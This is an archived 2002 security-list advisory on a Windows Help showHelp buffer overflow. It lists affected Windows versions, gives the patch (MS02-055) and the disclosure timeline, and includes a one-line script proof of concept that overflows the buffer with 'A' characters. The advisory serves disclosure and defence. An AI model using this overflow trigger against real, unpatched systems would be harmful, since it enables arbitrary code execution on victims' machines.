Thor Larholm security advisory TL#004

From: Thor Larholm (thorat_private)
Date: Wed Oct 09 2002 - 11:35:45 PDT

Next message: Kim Scarborough: "Re: CERT Advisory CA-2002-28 Trojan Horse Sendmail"

Previous message: Martin Schulze: "[SECURITY] [DSA 173-1] New bugzilla packages fix privilege escalation"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Thor Larholm security advisory TL#004

Topic: Windows Help buffer overflow

HTML version:
http://www.pivx.com/larholm/adv/TL004/

Discovery date: 31 July 2002

Release date: 4 October 2002

Affected applications

Microsoft Windows 98
Microsoft Windows 98 Second Edition
Microsoft Windows Millennium Edition
Microsoft Windows NT 4.0
Microsoft Windows NT 4.0, Terminal Server Edition
Microsoft Windows 2000
Microsoft Windows XP

Severity: High

Impact:
Arbitrary code execution, taking any action the user has privileges to
perform on the system.

Introduction
The Windows Help Facility exposes itself both as an ActiveX component and as
a part of Internet Explorer through the showHelp method. The showHelp
method, taking a URI as argument, has a fixed buffer that is easily
overflowed from a webpage or within an email.

Discussion:
The size of the fixed buffer varies for each Windows version, most likely
due to a dependency on a systemspecific variant size. This factor is not
mitigating in itself. The variance of this size is fixed and the overflow is
traditional. It is our belief that this overflow must be wellknown already
in the wild, as simple reallife usages of the showHelp method (using a
moderately long URI) would easily expose the existance of this
vulnerability.

Due to this belief, we feel that it will benefit and empower endusers more
if they are able to easily verify for themselves whether they are using a
vulnerable version of Windows Help. Others have recently made the public
aware of this vulnerability as well, though without disclosing any actual
details.

Exploit:

<script>showHelp( A*796 );</script>

Solution:
Apply the MS02-055 patch.

Demonstration:
I have put together some proof-of-concept examples. These do not run any
meaningful code but merely overflows the buffer with a lot of A characters.

Simple, oneclick testcase
http://www.pivx.com/larholm/adv/TL004/simple.html
Try your own numbers
http://www.pivx.com/larholm/adv/TL004/number.html

Vendor status:
Microsoft was notified 31 July 2002, they released MS02-055 on October 2,
2002.



Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC

Are You Secure?
http://www.PivX.com

Next message: Kim Scarborough: "Re: CERT Advisory CA-2002-28 Trojan Horse Sendmail"
Previous message: Martin Schulze: "[SECURITY] [DSA 173-1] New bugzilla packages fix privilege escalation"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Oct 09 2002 - 13:15:16 PDT